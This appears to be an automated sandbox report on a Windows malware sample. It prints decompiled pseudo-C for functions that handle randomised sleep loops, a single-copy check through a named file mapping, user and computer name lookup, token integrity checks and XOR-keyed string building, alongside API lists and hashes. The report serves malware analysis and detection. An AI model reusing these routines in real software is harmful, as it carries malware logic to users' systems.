API String ID: 3521023985-0
Opcode ID: 116f13f922ada32f6522df0bfcd6631dac5112852ba64a3c5c9d868d1d4b4f88
Instruction ID: 784f339e217d876974dbc85582df76bf93875f52c4790a018f318fb9d8add7b6
Opcode Fuzzy Hash: 116f13f922ada32f6522df0bfcd6631dac5112852ba64a3c5c9d868d1d4b4f88
Instruction Fuzzy Hash: 9651767580522AABDF109F94DC889EEBFB8FF58360F204126F810A2190D7719A44DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6C5017A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6C5017A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6C50146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6C5015A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6C501C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6C501CA4(E6C5016EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6C501D7C(_t45,  &_v48) != 0) {
					 *0x6c5041b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6c5041b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6C501C8F(_t50 + _t15);
				 *0x6c5041b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6C50136A(_t44);
					goto L11;
				}
			}

0x6c5017b3
0x6c5017bc
0x6c5017c0
0x6c5018c8
0x6c5018ce
0x00000000
0x00000000
0x00000000
0x6c5017c6
0x6c5017c6
0x6c5017cb
0x6c5017d1
0x6c5017e0
0x6c5017e1
0x6c5017e4
0x6c5017e7
0x6c5017f0
0x6c5017f4
0x6c5017fa
0x6c5017fe
0x6c501805
0x00000000
0x00000000
0x6c50180b
0x6c501812
0x6c501816
0x6c5018b9
0x6c5018b9
0x6c5018c0
0x6c5018c2
0x6c5018c2
0x00000000
0x6c5018c0
0x6c50181f
0x6c501872
0x6c501872
0x6c501883
0x6c501887
0x6c5018b5
0x6c501889
0x6c50188c
0x6c501894
0x6c501898
0x6c5018a0
0x6c5018a0
0x6c5018a7
0x6c5018a7
0x00000000
0x6c501887
0x6c50182d
0x6c50186c
0x00000000
0x6c50186c
0x6c50182f
0x6c501833
0x6c50183c
0x6c50183e
0x6c501842
0x6c501864
0x6c501864
0x00000000
0x6c501864
0x6c501844
0x6c501849
0x6c501850
0x6c501855
0x00000000
0x6c501857
0x6c50185a
0x6c50185d
0x00000000
0x6c50185d

APIs

Part of subcall function 6C50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6C5017B8,73B763F0,00000000), ref: 6C50147B
Part of subcall function 6C50146C: GetVersion.KERNEL32 ref: 6C50148A
Part of subcall function 6C50146C: GetCurrentProcessId.KERNEL32 ref: 6C501499
Part of subcall function 6C50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6C5014B2

GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6C5017CB
SwitchToThread.KERNEL32 ref: 6C5017D1

Part of subcall function 6C5015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6C5015F9
Part of subcall function 6C5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6C5017EC), ref: 6C50168B
Part of subcall function 6C5015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6C5016A6

Sleep.KERNELBASE(00000000,00000000), ref: 6C5017F4
GetLongPathNameW.KERNELBASE ref: 6C50183C
GetLongPathNameW.KERNELBASE ref: 6C50185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6C5016EC,?,00000000), ref: 6C50188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6C5018A0
CloseHandle.KERNEL32(00000000), ref: 6C5018A7
GetLastError.KERNEL32(6C5016EC,?,00000000), ref: 6C5018AF
GetLastError.KERNEL32 ref: 6C5018C2

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 5752f6e75f1a59005595f9d4c8a1ef0a1fe6be7c47b7d48667f56a48e0ad39d6
Instruction ID: d82bc1c4081339a93eb9576406dec1ba024d90decb5ee9a37e1ae434b7bc0ad1
Opcode Fuzzy Hash: 5752f6e75f1a59005595f9d4c8a1ef0a1fe6be7c47b7d48667f56a48e0ad39d6
Instruction Fuzzy Hash: 6A313A72B057119BD710DF658C8899B77FCBF8675CB150A2AF964D3640E730CA048BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00502D63, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00502D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00505901();
				if(_t27 != 0) {
					_t77 =  *0x50a2b4; // 0x2000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x50a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x50a14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00504097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x50a2d0; // 0x2add5a8
					_push(0x50a2d8);
					_push(1);
					_t7 = _t32 + 0x50b5bc; // 0x4d283a53
					 *0x50a2d4 = 0xc;
					 *0x50a2dc = 0;
					L00505EC2();
					_t36 = E005057AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00503946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00505C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x50a2d0; // 0x2add5a8
								_t18 = _t64 + 0x50b916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x50a328 = _t87;
						}
						_t38 = E00502304();
						 *0x50a2c8 =  *0x50a2c8 ^ 0xe8fa7dd7;
						 *0x50a318 = _t38;
						_t39 = E00505C4E(0x60);
						__eflags = _t39;
						 *0x50a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x50a37c; // 0x2fe9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x50a37c; // 0x2fe9630
							 *_t56 = 0x50b882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x50a290, _t84, 0x52);
							__eflags = _t42;
							 *0x50a310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x50a2b4; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x50a2d0; // 0x2add5a8
								_t19 = _t76 + 0x50b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x5092c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00503946( ~_v8 &  *0x50a2c8, 0x50a00c); // executed
								_t84 = E0050374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00503E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00501B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00505D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x50a150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E005063CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00502d63
0x00502d6e
0x00502d71
0x00502d74
0x00502d77
0x00502d7e
0x00502d80
0x00502d8c
0x00502d8e
0x00502d8e
0x00502d97
0x00502d9f
0x00502da2
0x00502dbc
0x00502dc1
0x00502dc2
0x00502dc4
0x00502dc9
0x00502dce
0x00502dd0
0x00502dd7
0x00502de1
0x00502de7
0x00502df4
0x00502dfb
0x00502e00
0x00502e00
0x00502e09
0x00502e32
0x00502e35
0x00502e42
0x00502e49
0x00502e55
0x00502e57
0x00502e59
0x00502e5e
0x00502e64
0x00502e6a
0x00502e70
0x00502e73
0x00502e78
0x00502e80
0x00502e82
0x00502e82
0x00502e85
0x00502e85
0x00502e8b
0x00502e90
0x00502e98
0x00502e9d
0x00502ea2
0x00502ea4
0x00502ea9
0x00502ed8
0x00502eab
0x00502eb0
0x00502eb5
0x00502eba
0x00502ec1
0x00502ec7
0x00502ecc
0x00502ed2
0x00502ed2
0x00502ed9
0x00502edb
0x00502eea
0x00502ef0
0x00502ef2
0x00502ef7
0x00502f23
0x00502ef9
0x00502ef9
0x00502eff
0x00502f0c
0x00502f12
0x00502f12
0x00502f1a
0x00502f1c
0x00502f24
0x00502f26
0x00502f2d
0x00502f3a
0x00502f44
0x00502f46
0x00502f48
0x00000000
0x00000000
0x00502f4a
0x00502f4f
0x00502f51
0x00502f58
0x00502f5c
0x00502f5f
0x00502f74
0x00502f78
0x00502f7d
0x00000000
0x00502f7d
0x00502f61
0x00502f63
0x00000000
0x00000000
0x00502f65
0x00502f6e
0x00502f70
0x00502f72
0x00000000
0x00000000
0x00000000
0x00502f72
0x00502f55
0x00502f55
0x00502f26
0x00502e0b
0x00502e0b
0x00502e10
0x00502f7f
0x00502f83
0x00502f8b
0x00502f8b
0x00000000
0x00502f83
0x00502e16
0x00502e19
0x00502e19
0x00502e1b
0x00502e1e
0x00502e26
0x00502e2d
0x00000000
0x00502f93
0x00502f93
0x00502f96
0x00502f9b
0x00502f9b

APIs

Part of subcall function 00505901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00502D7C,00000000,00000000,00000000,?,?,?,?,?,005044F9,?,00000001), ref: 00505910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0050A2D8,00000000), ref: 00502DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,005044F9,?,00000001), ref: 00502E00
wsprintfA.USER32 ref: 00502E80
memset.NTDLL ref: 00502EB0
RtlInitializeCriticalSection.NTDLL(02FE95F0), ref: 00502EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00502EEA
wsprintfA.USER32 ref: 00502F1A

Part of subcall function 00503946: GetUserNameW.ADVAPI32(00000000,?/P), ref: 0050397D
Part of subcall function 00503946: RtlAllocateHeap.NTDLL(00000000,?/P), ref: 00503994
Part of subcall function 00503946: GetUserNameW.ADVAPI32(00000000,?/P), ref: 005039A1
Part of subcall function 00503946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00502F3F,?,?,?,?,?,005044F9,?,00000001), ref: 005039C2
Part of subcall function 00503946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 005039E9
Part of subcall function 00503946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005039FD
Part of subcall function 00503946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00503A0A
Part of subcall function 00503946: HeapFree.KERNEL32(00000000,00000000), ref: 00503A28

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

Strings

~P, xrefs: 00502F8B

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: ~P
API String ID: 2910951584-1055297808
Opcode ID: 4849e87bd40a2c1df11bdb725cd0697c18dd6de0e60867cc8201253a60aed3ca
Instruction ID: b8c8e69fdc4d62e4023efb6653aa8520511f152d3bfaec89efe5ae327a4b225a
Opcode Fuzzy Hash: 4849e87bd40a2c1df11bdb725cd0697c18dd6de0e60867cc8201253a60aed3ca
Instruction Fuzzy Hash: A6512071940306ABDB21DBA4CC8EFAEBBB8BB64740F100525F904E72D1E7709D44DB91

Uniqueness

Uniqueness Score: -1.00%

Function 005057AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E005057AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00507F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x50a2d0; // 0x2add5a8
				_t5 = _t13 + 0x50b84d; // 0x2fe8df5
				_t6 = _t13 + 0x50b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00507C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x50a2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x005057ad
0x005057b5
0x005057b9
0x005057bf
0x005057c4
0x005057c9
0x005057cc
0x005057cf
0x005057d4
0x005057d5
0x005057d8
0x005057dd
0x005057e4
0x005057ee
0x005057f0
0x005057f1
0x005057f4
0x00505810
0x00505816
0x0050581a
0x00505868
0x0050581c
0x00505829
0x00505839
0x00505841
0x00505853
0x00505857
0x00000000
0x00000000
0x00505843
0x00505846
0x0050584b
0x0050584d
0x0050584d
0x0050582b
0x0050582d
0x00505859
0x0050585a
0x0050585a
0x00505829
0x0050586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00502DF9,?,00000001,?), ref: 005057B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005057CF
_snwprintf.NTDLL ref: 005057F4
CreateFileMappingW.KERNELBASE(000000FF,0050A2D4,00000004,00000000,00001000,?), ref: 00505810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9,?), ref: 00505822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00505839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9), ref: 0050585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00502DF9,?), ref: 00505862

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 338d595cf69ad1703fbf46e6a9f73d9d5dedbfe4f32f630ba16f6dc3873452c6
Instruction ID: 3a1c20a8c4f642403d5da19e714279403c26718bb4a69b1e37ad3e2fcafdef0e
Opcode Fuzzy Hash: 338d595cf69ad1703fbf46e6a9f73d9d5dedbfe4f32f630ba16f6dc3873452c6
Instruction Fuzzy Hash: 9821D276A01604FBD7219B64CC49F9E7BB9BF94740F248024FA05EB1E1E770A908DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00501041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00501041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x50a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00505C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00502A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0050104e
0x00501055
0x0050105c
0x00501070
0x0050107b
0x00501093
0x005010a0
0x005010a3
0x005010a8
0x005010b3
0x005010b7
0x005010c6
0x005010ca
0x005010e6
0x005010e6
0x005010ea
0x005010ea
0x005010ef
0x005010f3
0x005010f9
0x005010fa
0x00501101
0x00501107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00501073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00501093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 005010A3
CloseHandle.KERNEL32(00000000), ref: 005010F3

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 005010C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 005010CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 005010DE

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: e98686d6f4c7cce64200baa3ba9affaa07488812c421f5f4d52273357bfa41d7
Instruction ID: 6fb67f7aa804f1fa8a4e537b404206ae0de9ef4da7bfe4f48d0b4bd560294bfa
Opcode Fuzzy Hash: e98686d6f4c7cce64200baa3ba9affaa07488812c421f5f4d52273357bfa41d7
Instruction Fuzzy Hash: 0B214A7590024EFFEB109F90CC99EAEBFB9FB44304F0000A5E910A21A1DB714B44EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00504430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00504430(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x50a290 = _t14;
				if(_t14 != 0) {
					 *0x50a180 = GetTickCount();
					_t16 = E00502A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L005080B2();
						_t40 = _t18 + _t20;
						_t22 = E00503F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x50a2ac; // 0x2a8
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x50a2b8 = 1; // executed
						}
					}
					_t16 = E00502D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00504430
0x00504445
0x0050444d
0x00504452
0x00504465
0x0050446a
0x00504471
0x005044f9
0x005044ff
0x00000000
0x00000000
0x00000000
0x00504477
0x00504477
0x0050447c
0x00504482
0x00504488
0x00504492
0x00504496
0x00504497
0x0050449c
0x0050449d
0x0050449e
0x005044a3
0x005044a9
0x005044b2
0x005044b8
0x005044be
0x005044c3
0x005044ca
0x005044ce
0x005044d6
0x005044de
0x005044e0
0x005044e0
0x005044e8
0x005044ea
0x005044ea
0x005044e8
0x005044f4
0x00000000
0x005044f4
0x00504456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00504445
GetTickCount.KERNEL32 ref: 0050445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 0050447C
SwitchToThread.KERNEL32(?,00000001), ref: 00504482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 0050449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 005044B8
IsWow64Process.KERNEL32(000002A8,?,?,00000001), ref: 005044D6

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: deb819e3dbd16ac076094f044a90757c722a31a66e4eb40de613537925a23792
Instruction ID: 42e8237013aa13de774a60e35a075fe8f963267a115b70dd161c3f31d3bee1b6
Opcode Fuzzy Hash: deb819e3dbd16ac076094f044a90757c722a31a66e4eb40de613537925a23792
Instruction Fuzzy Hash: 3121A2F2A04305AFDB10AF64DC9DB2E7BE8BB54350F008929F655C2191D7749808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00505AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00505AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x50a2d0; // 0x2add5a8
				_t1 = _t9 + 0x50b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E005047BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x2fe9631
					_t40 = E00505C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00501AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00502A03(_t40);
						_t42 = E0050332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00502A03(_t36);
							_t36 = _t42;
						}
						_t43 = E00504138(_t36, _t33);
						if(_t43 != 0) {
							E00502A03(_t36);
							_t36 = _t43;
						}
					}
					E00502A03(_t28);
				}
				return _t36;
			}

0x00505ae3
0x00505ae6
0x00505ae7
0x00505aee
0x00505af5
0x00505afc
0x00505b00
0x00505b07
0x00505b0e
0x00505b13
0x00505b1b
0x00505b25
0x00505b29
0x00505b2d
0x00505b33
0x00505b38
0x00505b42
0x00505b48
0x00505b4a
0x00505b61
0x00505b65
0x00505b68
0x00505b6d
0x00505b6d
0x00505b76
0x00505b7a
0x00505b7d
0x00505b82
0x00505b82
0x00505b7a
0x00505b85
0x00505b8a
0x00505b90

APIs

Part of subcall function 005047BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00505AFC,253D7325,00000000,00000000,?,00000000,00506301), ref: 00504821
Part of subcall function 005047BA: sprintf.NTDLL ref: 00504842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B0E
lstrlen.KERNEL32(00000000,?,00000000,00506301,00000000,02FE9630), ref: 00505B16

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

strcpy.NTDLL ref: 00505B2D
lstrcat.KERNEL32(00000000,00000000), ref: 00505B38

Part of subcall function 00501AF1: lstrlen.KERNEL32(00000000,00000000,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00501B02

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00505B55

Part of subcall function 0050332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00505B61,00000000,?,00000000,00506301,00000000,02FE9630), ref: 00503339
Part of subcall function 0050332F: _snprintf.NTDLL ref: 00503397

Strings

=, xrefs: 00505B4F

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

